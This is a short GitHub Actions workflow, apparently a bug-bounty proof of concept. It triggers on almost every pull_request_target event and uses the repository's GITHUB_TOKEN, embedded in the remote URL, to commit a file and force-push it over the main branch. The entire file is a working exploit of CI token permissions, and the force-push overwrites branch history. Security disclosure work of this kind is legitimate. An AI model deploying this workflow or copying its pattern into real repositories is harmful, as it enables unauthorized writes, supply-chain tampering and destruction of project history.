on:
  pull_request_target:
    types: [assigned, opened, synchronize, reopened, unassigned, labeled, unlabeled, edited, closed, converted_to_draft, ready_for_review, locked, unlocked, review_requested, review_request_removed ,auto_merge_enabled, auto_merge_disabled]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: This is a POC
        run: |
          echo test > newfile
          git add newfile
          git config --local user.email "wi11@wearehackerone.com"
          git config --local user.name "wi11"
          git commit -m "Add changes" -a
          git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}
          git push --force origin HEAD:refs/heads/main
